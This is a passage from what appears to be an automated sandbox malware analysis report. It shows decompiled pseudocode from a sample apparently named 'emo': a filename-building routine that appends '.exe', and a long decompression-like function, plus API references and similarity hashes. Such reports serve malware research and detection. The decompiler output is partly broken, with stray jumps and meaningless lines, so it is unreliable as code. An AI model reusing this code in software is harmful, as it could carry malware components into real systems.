				L041D21E0(_t19 + _t24 * 2, _t28);
				_t25 = _t24 + _t28;
				 *((intOrPtr*)(_t19 + _t25 * 2)) = 0x65002e;
				 *((intOrPtr*)(_t19 + 4 + _t25 * 2)) = 0x650078;
				 *((short*)(_t19 + 8 + _t25 * 2)) = 0;
				return 0;
			}

0x041dfca3
0x041dfcae
0x041dfcbb
0x041dfcc2
0x041dfcc6
0x041dfcd5
0x041dfcda
0x041dfcdf
0x041dfce3
0x041dfcea
0x041dfcf2
0x041dfcfa

APIs

lstrlenW.KERNEL32 ref: 041DFCB5
GetTickCount.KERNEL32 ref: 041DFCC7

Strings

x, xrefs: 041DFCEA

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: CountTicklstrlen
String ID: x
API String ID: 2992449761-2363233923
Opcode ID: 867be1e96b7962bc6bf5b1764266c1c91845ed487babfb253fed766045258cbc
Instruction ID: c074142f3d3f64c08220e87520a04990a9dcbdf899af30d303a2b23be829aa0d
Opcode Fuzzy Hash: 867be1e96b7962bc6bf5b1764266c1c91845ed487babfb253fed766045258cbc
Instruction Fuzzy Hash: 69F0E2B6A043056BE7205FE1DC84B053659EF44356F044070EA05EF282DB74CC4083E0

Uniqueness

Uniqueness Score: -1.00%

Function 041D5EE5, Relevance: 5.1, APIs: 4, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E041D5EE5(void* __ebx, void __edi, signed int __esi) {
				signed int _t597;
				signed int _t599;
				void* _t600;
				signed int _t610;
				signed int* _t620;
				signed int _t623;
				signed int _t640;
				signed int _t642;
				signed int _t644;
				signed int _t652;
				signed int _t655;
				signed int _t657;
				signed int _t660;
				signed int _t666;
				signed int _t669;
				signed int _t671;
				void* _t673;
				signed int _t676;
				signed int _t680;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				signed int _t690;
				unsigned int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t699;
				signed int _t709;
				signed int _t714;
				signed int _t716;
				signed int _t719;
				signed int _t721;
				signed int _t722;
				intOrPtr _t734;
				intOrPtr _t735;
				intOrPtr _t736;
				signed int _t739;
				signed int _t743;
				void* _t749;
				signed int _t754;
				signed int _t756;
				signed int _t760;
				signed int _t764;
				signed int _t767;
				signed int _t771;
				void* _t776;
				signed int _t780;
				void* _t781;
				signed int _t786;
				void* _t787;
				void* _t788;
				signed int _t793;
				signed int _t794;
				void* _t796;
				signed int _t797;
				signed int _t804;
				signed int _t806;
				intOrPtr* _t808;
				void* _t809;
				signed int _t820;
				signed int _t822;
				intOrPtr _t824;
				signed char _t828;
				intOrPtr* _t830;
				void* _t831;
				signed int _t839;
				void* _t841;
				void* _t843;
				signed int _t845;
				intOrPtr _t846;
				signed int _t856;
				signed int _t859;
				void* _t860;
				void* _t861;
				void* _t862;
				void* _t863;
				void* _t864;
				void* _t865;
				void* _t866;
				void* _t867;
				signed char _t868;
				signed char _t871;
				intOrPtr _t873;
				signed int _t876;
				void* _t877;
				signed char _t879;
				signed int _t880;
				signed int _t881;
				signed char _t886;
				signed int _t888;
				void* _t889;
				void* _t890;
				signed int _t893;
				signed char _t894;
				intOrPtr _t896;
				intOrPtr _t898;
				void* _t901;
				signed char _t902;
				signed char _t903;
				void _t904;
				signed int _t908;
				signed char _t913;
				void* _t914;
				void* _t915;
				signed int _t918;
				void* _t923;
				signed int _t927;
				signed char _t931;
				signed int _t932;
				signed char _t935;
				signed int _t936;
				void* _t944;
				signed int _t959;
				unsigned int _t962;
				signed int _t963;
				signed int _t965;
				signed int _t969;
				signed int* _t970;
				signed char* _t975;
				void* _t976;
				void* _t981;
				signed int _t982;
				signed int _t983;
				signed int _t986;
				signed int _t987;
				signed int _t989;
				signed int _t991;
				signed int _t992;
				signed int _t995;
				signed int _t999;
				signed int _t1005;
				signed int _t1006;
				int _t1007;
				int _t1009;
				signed int _t1010;
				unsigned int _t1013;
				void* _t1017;
				intOrPtr _t1018;
				signed char _t1019;
				void _t1022;
				void* _t1024;
				signed int _t1025;
				void* _t1027;
				int _t1032;
				signed int _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1038;
				void* _t1040;
				signed int _t1042;
				signed int _t1043;
				unsigned int _t1045;
				signed int _t1046;
				unsigned int _t1048;
				signed int _t1049;
				signed char _t1057;
				void* _t1058;
				void* _t1060;
				void* _t1061;

				L0:
				while(1) {
					L0:
					_t1043 = __esi;
					_t1022 = __edi;
					_t841 = __ebx;
					_t596 = memset(__edi + 0x1b80, 0, ??);
					_t962 =  *(_t1058 - 4);
					_t1061 = _t1060 + 0xc;
					while(1) {
						L135:
						 *(_t1058 - 8) = _t893;
						__eflags = _t893 -  *((intOrPtr*)(_t1022 + 0x34));
						if(_t893 >=  *((intOrPtr*)(_t1022 + 0x34))) {
							break;
						}
						L136:
						__eflags = _t1043 - 3;
						if(_t1043 >= 3) {
							L139:
							_t927 = _t991 & 0x00000007;
							_t991 = _t991 >> 3;
							_t1043 = _t1043 - 3;
							 *(_t1058 - 4) = _t991;
							 *(_t1058 - 0x1c) = _t1043;
							_t596 =  *( *(_t1058 - 8) + 0x41e1a24) & 0x000000ff;
							 *(_t596 + _t1022 + 0x1b80) = _t927;
							_t893 =  *(_t1058 - 8) + 1;
							continue;
						} else {
							while(1) {
								L137:
								__eflags = _t841 -  *(_t1058 - 0x20);
								if(_t841 >=  *(_t1058 - 0x20)) {
									break;
								}
								L138:
								_t596 = ( *_t841 & 0x000000ff) << _t1043;
								_t841 = _t841 + 1;
								_t991 = _t991 | _t596;
								 *(_t1058 - 0x18) = _t841;
								_t1043 = _t1043 + 8;
								 *(_t1058 - 4) = _t991;
								__eflags = _t1043 - 3;
								if(_t1043 < 3) {
									continue;
								} else {
									goto L139;
								}
								goto L295;
							}
							L249:
							 *_t1022 = 0xe;
							L285:
							__eflags =  *(_t1058 + 0x18) & 0x00000002;
							L286:
							L287:
							_t597 =  !=  ? 1 : _t596;
							 *(_t1058 - 0xc) = _t597;
							__eflags = _t597 - 1;
							if(_t597 != 1) {
								L288:
								__eflags = _t597 - 0xfffffffc;
								if(_t597 != 0xfffffffc) {
									L289:
									L292:
									_t642 =  *(_t1058 - 0x3c);
									__eflags = _t841 - _t642;
									if(_t841 > _t642) {
										while(1) {
											L293:
											__eflags = _t1043 - 8;
											if(_t1043 < 8) {
												goto L295;
											}
											L294:
											_t841 = _t841 - 1;
											_t1043 = _t1043 - 8;
											__eflags = _t841 - _t642;
											if(_t841 > _t642) {
												continue;
											}
											goto L295;
										}
									}
								}
							}
						}
						L295:
						_t963 =  *(_t1058 - 4);
						L296:
						 *(_t1022 + 4) = _t1043;
						asm("bts ecx, esi");
						__eflags = _t1043 - 0x20;
						_t599 =  >=  ? 0 : 0;
						_t856 = 0 ^ _t599;
						__eflags = _t1043 - 0x40;
						_t600 =  >=  ? _t856 : _t599;
						 *(_t1022 + 0x20) =  *(_t1058 - 0x28);
						_t965 =  *(_t1058 - 0x10) -  *(_t1058 + 0x10);
						__eflags =  *(_t1058 + 0x18) & 0x00000009;
						 *(_t1022 + 0x24) =  *(_t1058 - 8);
						 *(_t1022 + 0x28) =  *(_t1058 - 0x38);
						 *((intOrPtr*)(_t1022 + 0x3c)) =  *((intOrPtr*)(_t1058 - 0x48));
						 *(_t1022 + 0x38) = _t856 - 0x00000001 & _t963;
						 *(_t1058 - 0x10) = _t965;
						 *((intOrPtr*)( *((intOrPtr*)(_t1058 + 8)))) = _t841 -  *(_t1058 - 0x3c);
						_t843 =  *(_t1058 - 0xc);
						 *( *(_t1058 + 0x14)) = _t965;
						if(( *(_t1058 + 0x18) & 0x00000009) != 0) {
							L297:
							__eflags = _t843;
							if(_t843 >= 0) {
								L298:
								_t1045 =  *(_t1022 + 0x1c);
								_t859 = _t1045 & 0x0000ffff;
								_t610 = (0x5e6ea9af * _t965 >> 0x20 >> 0xb) * 0x15b0;
								_t1046 = _t1045 >> 0x10;
								 *(_t1058 - 0x3c) = _t1046;
								_t969 =  *(_t1058 - 0x10) - _t610;
								__eflags =  *(_t1058 - 0x10);
								 *(_t1058 - 0x34) = _t969;
								if( *(_t1058 - 0x10) != 0) {
									L299:
									_t845 = _t969;
									do {
										L300:
										_t970 = 0;
										 *(_t1058 + 0x14) = 0;
										__eflags = _t845 - 7;
										if(_t845 > 7) {
											L301:
											goto 0x41f15c6;
											asm("int3");
											asm("int3");
											asm("int3");
											L302:
											_t1024 = _t1022 - _t610;
											__eflags = _t1024;
											do {
												L303:
												_t970 =  &(_t970[2]);
												_t861 = _t859 + ( *_t610 & 0x000000ff);
												_t862 = _t861 + ( *( *(_t1058 + 0x10) + 1) & 0x000000ff);
												_t863 = _t862 + ( *( *(_t1058 + 0x10) + 2) & 0x000000ff);
												_t864 = _t863 + ( *( *(_t1058 + 0x10) + 3) & 0x000000ff);
												_t865 = _t864 + ( *( *(_t1058 + 0x10) + 4) & 0x000000ff);
												_t866 = _t865 + ( *( *(_t1058 + 0x10) + 5) & 0x000000ff);
												_t867 = _t866 + ( *( *(_t1058 + 0x10) + 6) & 0x000000ff);
												_t859 = _t867 + ( *( *(_t1058 + 0x10) + 7) & 0x000000ff);
												_t640 =  *(_t1058 + 0x10) + 8;
												_t1046 = _t1046 + _t861 + _t862 + _t863 + _t864 + _t865 + _t866 + _t867 + _t859;
												 *(_t1058 + 0x10) = _t640;
												__eflags = _t1024 + _t640 - _t845;
												_t610 =  *(_t1058 + 0x10);
											} while (_t1024 + _t640 < _t845);
											 *(_t1058 + 0x14) = _t970;
											 *(_t1058 - 0x3c) = _t1046;
										}
										L305:
										_t1022 = 0;
										 *((intOrPtr*)(_t1058 + 8)) = 0;
										__eflags = _t970 - _t845;
										if(_t970 < _t845) {
											L306:
											__eflags = _t845 - _t970 - 2;
											if(_t845 - _t970 >= 2) {
												L307:
												_t620 =  *(_t1058 + 0x14);
												_t1049 =  *(_t1058 + 0x10);
												_t846 = 0;
												_t981 = (_t845 - _t620 - 2 >> 1) + 1;
												__eflags = _t981;
												 *(_t1058 + 0x14) = _t620 + _t981 * 2;
												do {
													L308:
													_t860 = _t859 + ( *_t1049 & 0x000000ff);
													_t623 =  *(_t1049 + 1) & 0x000000ff;
													_t1022 = _t1022 + _t860;
													_t1049 = _t1049 + 2;
													_t859 = _t860 + _t623;
													_t846 = _t846 + _t859;
													_t981 = _t981 - 1;
													__eflags = _t981;
												} while (_t981 != 0);
												_t970 =  *(_t1058 + 0x14);
												 *(_t1058 + 0x10) = _t1049;
												_t1046 =  *(_t1058 - 0x3c);
												 *((intOrPtr*)(_t1058 + 8)) = _t846;
												_t845 =  *(_t1058 - 0x34);
											}
											L310:
											__eflags = _t970 - _t845;
											if(_t970 < _t845) {
												_t975 =  *(_t1058 + 0x10);
												_t859 = _t859 + ( *_t975 & 0x000000ff);
												_t1046 = _t1046 + _t859;
												_t976 =  &(_t975[1]);
												__eflags = _t976;
												 *(_t1058 + 0x10) = _t976;
											}
											L312:
											_t610 =  *((intOrPtr*)(_t1058 + 8)) + _t1022;
											_t1046 = _t1046 + _t610;
											__eflags = _t1046;
										}
										L313:
										L314:
										_t859 = _t859 + (_t610 * _t859 >> 0x20 >> 0xf) * 0xffff000f;
										_t610 = (0x80078071 * _t1046 >> 0x20 >> 0xf) * 0xffff000f;
										_t1046 = _t1046 + _t610;
										_t586 = _t1058 - 0x10;
										 *_t586 =  *(_t1058 - 0x10) - _t845;
										__eflags =  *_t586;
										_t845 = 0x15b0;
										 *(_t1058 - 0x3c) = _t1046;
										 *(_t1058 - 0x34) = 0x15b0;
									} while ( *_t586 != 0);
									goto 0x41f15ef;
									asm("int3");
								}
								L316:
								_t1048 = (_t1046 << 0x10) + _t859;
								 *(_t1022 + 0x1c) = _t1048;
								__eflags = _t843;
								if(_t843 == 0) {
									__eflags =  *(_t1058 + 0x18) & 0x00000001;
									if(( *(_t1058 + 0x18) & 0x00000001) != 0) {
										__eflags = _t1048 -  *(_t1022 + 0x10);
										_t843 =  !=  ? 0xfffffffe : _t843;
										__eflags = _t843;
									}
								}
							}
						}
						L319:
						return _t843;
						L320:
					}
					L140:
					 *((intOrPtr*)(_t1022 + 0x34)) = 0x13;
					while(1) {
						L141:
						_t694 =  *(_t1022 + 0x18);
						__eflags = _t694;
						if(_t694 >= 0) {
							break;
						}
						L218:
						_t982 =  *(_t1058 - 4);
						while(1) {
							L39:
							_t879 =  *(_t1058 - 0x20) - _t841;
							__eflags = _t879 - 4;
							if(_t879 < 4) {
								goto L58;
							}
							L40:
							_t1022 =  *(_t1058 - 0x14);
							__eflags =  *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) - 2;
							if( *((intOrPtr*)(_t1058 - 0x40)) -  *(_t1058 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1043 - 0xf;
								if(_t1043 < 0xf) {
									_t995 =  *(_t841 + 1) & 0x000000ff;
									_t879 = _t1043;
									_t722 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | (_t995 << 0x00000008 | _t722) << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
								}
								_t596 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t596;
								__eflags = _t596;
								if(_t596 < 0) {
									L45:
									goto 0x41f145c;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t709 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t709 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L44:
									_t879 = _t596 >> 9;
								}
								L48:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 & 0x00000100;
								if((_t880 & 0x00000100) != 0) {
									L84:
									_t881 = _t880 & 0x000001ff;
									 *(_t1058 - 8) = _t881;
									__eflags = _t881 - 0x100;
									if(_t881 != 0x100) {
										L219:
										_t673 = _t881 * 4 - 0x404;
										_t868 =  *(_t673 + 0x41e1010);
										_t596 =  *(_t673 + 0x41e1a48);
										 *(_t1058 - 0x38) = _t868;
										 *(_t1058 - 8) = _t596;
										__eflags = _t868;
										if(_t868 == 0) {
											L225:
											__eflags = _t1043 - 0xf;
											if(_t1043 >= 0xf) {
												L3:
												_t655 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
												 *(_t1058 - 0x1c) = _t655;
												if(_t655 < 0) {
													L5:
													goto 0x41f13e3;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t657 = _t962 >> _t868;
														_t868 = _t868 + 1;
														_t841 =  *((short*)(_t1022 + 0x1700 + ((_t657 & 0x00000001) +  !_t841) * 2));
														__eflags = _t841;
													} while (_t841 < 0);
													 *(_t1058 - 0x1c) = _t841;
													_t841 =  *(_t1058 - 0x18);
													_t660 =  *(_t1058 - 0x1c);
												} else {
													L4:
													_t868 = _t655 >> 9;
													_t660 = _t655 & 0x000001ff;
												}
												L9:
												_t982 = _t962 >> _t868;
												_t1043 = _t1043 - _t868;
												_t871 =  *(0x41e1090 + _t660 * 4);
												_t596 =  *(0x41e1110 + _t660 * 4);
												 *(_t1058 - 4) = _t982;
												 *(_t1058 - 0x38) = _t871;
												 *(_t1058 - 0x28) = _t596;
												if(_t871 == 0) {
													L15:
													_t873 =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 + 0xc));
													 *((intOrPtr*)(_t1058 - 0x48)) = _t873;
													if(_t596 <= _t873 || ( *(_t1058 + 0x18) & 0x00000004) == 0) {
														L17:
														_t1022 =  *(_t1058 - 0x14);
														_t876 = (_t873 - _t596 &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc));
														 *(_t1058 - 0xc) = _t876;
														_t662 =  >  ?  *(_t1058 - 0x10) : _t876;
														_t877 =  *(_t1058 - 8);
														_t663 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877;
														_t1075 = ( >  ?  *(_t1058 - 0x10) : _t876) + _t877 -  *((intOrPtr*)(_t1058 - 0x40));
														if(( >  ?  *(_t1058 - 0x10) : _t876) + _t877 <=  *((intOrPtr*)(_t1058 - 0x40))) {
															L21:
															__eflags = _t877 - 9;
															if(_t877 < 9) {
																L30:
																goto 0x41f1420;
																asm("int3");
																do {
																	L32:
																	_t877 = _t877 - 3;
																	 *_t1022 =  *_t982 & 0x000000ff;
																	 *((char*)(_t1022 + 1)) =  *(_t982 + 1) & 0x000000ff;
																	_t666 =  *(_t982 + 2) & 0x000000ff;
																	_t982 = _t982 + 3;
																	 *(_t1022 + 2) = _t666;
																	_t1022 = _t1022 + 3;
																	__eflags = _t877 - 2;
																} while (_t877 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t877 -  *(_t1058 - 0x28);
																if(_t877 >  *(_t1058 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1042 =  *(_t1058 - 0xc);
																	_t959 =  *(_t1058 - 0x10);
																	_t828 = (_t877 & 0xfffffff8) + _t1042;
																	 *(_t1058 - 0x24) = _t828;
																	_t1019 = _t828;
																	do {
																		L24:
																		 *_t959 =  *_t1042;
																		_t830 =  *((intOrPtr*)(_t1042 + 4));
																		_t1042 = _t1042 + 8;
																		 *((intOrPtr*)(_t959 + 4)) = _t830;
																		_t959 = _t959 + 8;
																		__eflags = _t1042 - _t1019;
																	} while (_t1042 < _t1019);
																	_t982 =  *(_t1058 - 4);
																	 *(_t1058 - 0x10) = _t959;
																	_t877 =  *(_t1058 - 8) & 0x00000007;
																	 *(_t1058 - 0xc) = _t1042;
																	_t1022 =  *(_t1058 - 0x14);
																	 *(_t1058 - 8) = _t877;
																	__eflags = _t877 - 3;
																	if(_t877 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t831 = _t877;
																_t877 = _t877 - 1;
																 *(_t1058 - 8) = _t877;
																if(_t831 == 0) {
																	goto L39;
																}
																L19:
																if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																	L238:
																	 *(_t1058 - 0xc) = 2;
																	 *_t1022 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																	 *((intOrPtr*)(_t1058 - 0x48)) =  *((intOrPtr*)(_t1058 - 0x48)) + 1;
																	 *( *(_t1058 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1058 - 0x48)) -  *(_t1058 - 0x28) &  *(_t1058 - 0x34)) +  *((intOrPtr*)(_t1058 + 0xc))));
																	_t982 =  *(_t1058 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t879 =  *(_t1058 - 0x20) - _t841;
																__eflags = _t879 - 4;
																if(_t879 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L270:
														_t684 = _t596 | 0xffffffff;
														 *_t1022 = 0x25;
														goto L291;
													}
												} else {
													L10:
													if(_t1043 >= _t871) {
														L13:
														_t1043 = _t1043 - _t871;
														_t839 = (_t596 << _t871) - 0x00000001 & _t982;
														_t982 = _t982 >> _t871;
														 *(_t1058 - 0x28) =  *(_t1058 - 0x28) + _t839;
														_t596 =  *(_t1058 - 0x28);
														 *(_t1058 - 4) = _t982;
														goto L15;
													} else {
														L11:
														while(_t841 <  *(_t1058 - 0x20)) {
															_t596 = ( *_t841 & 0x000000ff) << _t1043;
															_t841 = _t841 + 1;
															_t871 =  *(_t1058 - 0x38);
															_t982 = _t982 | _t596;
															_t1043 = _t1043 + 8;
															 *(_t1058 - 0x18) = _t841;
															 *(_t1058 - 4) = _t982;
															if(_t1043 < _t871) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														 *_t1022 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1058 - 0x20) - _t841 - 2;
												if( *(_t1058 - 0x20) - _t841 >= 2) {
													L237:
													_t983 =  *(_t841 + 1) & 0x000000ff;
													_t676 =  *_t841 & 0x000000ff;
													_t841 = _t841 + 2;
													_t1022 =  *(_t1058 - 0x14);
													_t868 = _t1043;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) =  *(_t1058 - 4) | _t983 << _t1043 + 0x00000008 | _t676 << _t868;
													_t1043 = _t1043 + 0x10;
													_t962 =  *(_t1058 - 4);
												} else {
													do {
														L227:
														_t596 =  *((short*)(_t1022 + 0xf00 + (_t962 & 0x000003ff) * 2));
														 *(_t1058 - 0x24) = _t596;
														__eflags = _t596;
														if(_t596 < 0) {
															L231:
															__eflags = _t1043 - 0xa;
															if(_t1043 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1058 - 0x1c) = _t868;
																while(1) {
																	L234:
																	_t868 =  *((short*)(_t1022 + 0x1700 + ((_t962 >> _t868 & 0x00000001) +  !( *(_t1058 - 0x24))) * 2));
																	_t652 =  *(_t1058 - 0x1c) + 1;
																	 *(_t1058 - 0x24) = _t868;
																	 *(_t1058 - 0x1c) = _t652;
																	__eflags = _t868;
																	if(_t868 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t596 = _t652 + 1;
																	__eflags = _t1043 - _t596;
																	if(_t1043 < _t596) {
																		goto L1;
																	} else {
																		L236:
																		_t868 =  *(_t1058 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t596 = _t596 >> 9;
															__eflags = _t596;
															if(_t596 == 0) {
																L1:
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L264:
																	 *_t1022 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t868 = _t1043;
														_t644 = ( *_t841 & 0x000000ff) << _t868;
														_t841 = _t841 + 1;
														_t962 = _t962 | _t644;
														 *(_t1058 - 0x18) = _t841;
														_t1043 = _t1043 + 8;
														 *(_t1058 - 4) = _t962;
													} while (_t1043 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1043 - _t868;
											if(_t1043 >= _t868) {
												L223:
												L224:
												_t1043 = _t1043 - _t868;
												_t680 = (_t596 << _t868) - 0x00000001 & _t962;
												_t962 = _t962 >> _t868;
												_t456 = _t1058 - 8;
												 *_t456 =  *(_t1058 - 8) + _t680;
												__eflags =  *_t456;
												 *(_t1058 - 4) = _t962;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L222:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t868 =  *(_t1058 - 0x38);
													_t962 = _t962 | _t596;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 0x18) = _t841;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - _t868;
													if(_t1043 < _t868) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1022 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1022 + 0x14) & 0x00000001;
											if(( *(_t1022 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1043 - 3;
											if(_t1043 >= 3) {
												L89:
												_t1043 = _t1043 - 3;
												_t693 = _t962 & 0x00000007;
												_t991 = _t962 >> 3;
												 *(_t1022 + 0x14) = _t693;
												_t596 = _t693 >> 1;
												__eflags = _t596;
												 *(_t1058 - 4) = _t991;
												 *(_t1058 - 0x1c) = _t1043;
												 *(_t1022 + 0x18) = _t596;
												if(_t596 != 0) {
													L124:
													__eflags = _t596 - 3;
													if(_t596 == 3) {
														L266:
														 *(_t1058 - 0xc) = 0xffffffff;
														 *_t1022 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t596 - 1;
														if(_t596 != 1) {
															L128:
															_t893 = 0;
															__eflags = 0;
															while(1) {
																L129:
																 *(_t1058 - 8) = _t893;
																__eflags = _t893 - 3;
																if(_t893 >= 3) {
																	break;
																}
																L130:
																_t596 =  *((char*)(_t893 + 0x41e1004));
																 *(_t1058 - 0x1c) = _t596;
																__eflags = _t1043 - _t596;
																if(_t1043 >= _t596) {
																	L133:
																	_t1017 = _t1022 + _t893 * 4;
																	_t1036 =  *(_t1058 - 4);
																	 *(_t1017 + 0x2c) = (0x00000001 <<  *(_t1058 - 0x1c)) - 0x00000001 & _t1036;
																	_t804 =  *(_t1058 - 8);
																	_t931 =  *((char*)(_t804 + 0x41e1004));
																	_t1037 = _t1036 >> _t931;
																	_t1043 = _t1043 - _t931;
																	_t932 = _t804;
																	 *(_t1058 - 4) = _t1037;
																	 *(_t1058 - 0x1c) = _t1043;
																	_t596 =  *(0x41e1a38 + _t932 * 4);
																	 *(_t1017 + 0x2c) =  *(_t1017 + 0x2c) +  *(0x41e1a38 + _t932 * 4);
																	_t991 = _t1037;
																	_t1022 =  *(_t1058 - 0x14);
																	_t893 = _t932 + 1;
																	continue;
																} else {
																	while(1) {
																		L131:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
																		}
																		L132:
																		_t806 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t893 =  *(_t1058 - 8);
																		_t991 = _t991 | _t806;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 0x18) = _t841;
																		 *(_t1058 - 4) = _t991;
																		_t596 =  *((char*)(_t893 + 0x41e1004));
																		 *(_t1058 - 0x1c) = _t596;
																		__eflags = _t1043 - _t596;
																		if(_t1043 < _t596) {
																			continue;
																		} else {
																			goto L133;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1022 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L134:
															goto L0;
														} else {
															L126:
															goto 0x41f14d8;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t596 + 0x2c)) = 0x120;
															L127:
															_t808 = _t596 + 1 - 0x20;
															 *_t808 =  *_t808 + _t808;
															_t841 = _t841 + _t808;
															_t809 = _t808 + 1;
															 *_t809 =  *_t809 ^ _t809;
															 *_t809 = _t809 +  *_t809;
															 *0xde0 =  *0xde0 + _t809;
															memset(_t809, ??, ??);
															asm("movdqa xmm0, [0x41e1ae0]");
															_t1061 = _t1061 + 0xc;
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqu [edi+0x70], xmm0");
															asm("movdqu [edi+0x80], xmm0");
															asm("movdqu [edi+0x90], xmm0");
															asm("movdqu [edi+0xa0], xmm0");
															asm("movdqu [edi+0xb0], xmm0");
															asm("movdqu [edi+0xc0], xmm0");
															_t1038 = _t1022 + 0xd0;
															asm("movdqa xmm0, [0x41e1af0]");
															asm("movdqu [edi], xmm0");
															asm("movdqu [edi+0x10], xmm0");
															asm("movdqu [edi+0x20], xmm0");
															asm("movdqu [edi+0x30], xmm0");
															asm("movdqu [edi+0x40], xmm0");
															asm("movdqu [edi+0x50], xmm0");
															asm("movdqu [edi+0x60], xmm0");
															asm("movdqa xmm0, [0x41e1ad0]");
															asm("movdqu [edi+0x70], xmm0");
															asm("movq [edi+0x80], xmm0");
															 *((intOrPtr*)(_t1038 + 0x88)) = 0x8080808;
															 *((intOrPtr*)(_t1038 + 0x8c)) = 0x8080808;
															_t1022 =  *(_t1058 - 0x14);
															goto L141;
														}
													}
												} else {
													L90:
													_t596 = _t1043 & 0x00000007;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														L93:
														_t935 = _t1043 & 0x00000007;
														_t962 = _t991 >> _t935;
														_t1043 = _t1043 - _t935;
														 *(_t1058 - 4) = _t962;
														_t936 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1058 - 8) = _t936;
															__eflags = _t936 - 4;
															if(_t936 >= 4) {
																break;
															}
															L95:
															__eflags = _t1043;
															if(_t1043 == 0) {
																L101:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	L244:
																	 *_t1022 = 7;
																	goto L285;
																} else {
																	L102:
																	_t596 =  *_t841;
																	_t841 = _t841 + 1;
																	(_t1022 + 0x2920)[_t936] = _t596;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 0x18) = _t841;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1043 - 8;
																if(_t1043 >= 8) {
																	L100:
																	(_t1022 + 0x2920)[_t936] = _t962;
																	_t1043 = _t1043 - 8;
																	_t962 = _t962 >> 8;
																	_t936 = _t936 + 1;
																	 *(_t1058 - 4) = _t962;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t841 -  *(_t1058 - 0x20);
																		if(_t841 >=  *(_t1058 - 0x20)) {
																			break;
